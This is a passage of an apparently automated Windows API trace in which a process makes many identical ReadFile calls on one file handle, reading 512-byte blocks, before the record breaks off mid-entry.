1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.995] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.995] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.995] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.995] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.998] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.999] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.000] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.001] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.002] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.003] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.004] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0203.005] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, 